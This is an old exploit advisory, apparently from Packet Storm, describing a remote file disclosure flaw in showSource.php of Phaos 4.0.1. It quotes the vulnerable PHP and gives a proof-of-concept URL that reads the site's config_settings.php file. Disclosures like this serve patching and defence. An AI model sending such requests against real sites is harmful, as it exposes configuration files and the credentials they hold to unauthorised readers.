Phaos version 4.0.1 suffers from a remote file disclosure vulnerability.
a15dd3958d2f5afeb31686556313b2273d7fcd60f9317f7e5c8728c7c1ba3a29####################################################################################
}}} Remote File Disclosure Vulnerability {{{
in (showSource.php) phaos4.0.1
MY HOmE : WWW.PAL-HACkEr.COM WWW.ATSDP.COM
####################################################################################
## AUTHOR : HaCkeR_EgY
## My HoMe : www.PaL-HaCker.com & www.ATSDP.com
## ConTacT : hacker_egy@hotmail.com
-----------------------------------------------
## script: phaos4.0.1
##download:http://sourceforge.net/project/showfiles.php?group_id=111506
###################################################################
### vurn C0dE :
## line 16:
showSource($file, $line, $prev, $next); <=====
function showSource($file, $line, $prev = 10, $next = 10) {
if (!(file_exists($file) && is_file($file))) {
return trigger_error("showSource() failed, file does not exist `$file`", E_USER_ERROR);
return false;
}
//read code
## line 35 : ob_start();
highlight_file($file); <<========
$data = ob_get_contents();
ob_end_clean();
## P0C:
http://localhost/[path]/erorr/showSource.php?file=config_settings.php
#################################################################################
## GREETZ TO : My BrOther and My MasTer " Abo Mohamed " ADMIN PAL-HACKER
## Thanx : F0UaD Pr0gRaMeR , FiReSell , MoHamed EL Arab , Mr.exe , zaradusht , and all " pal-hacker members "
#####################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed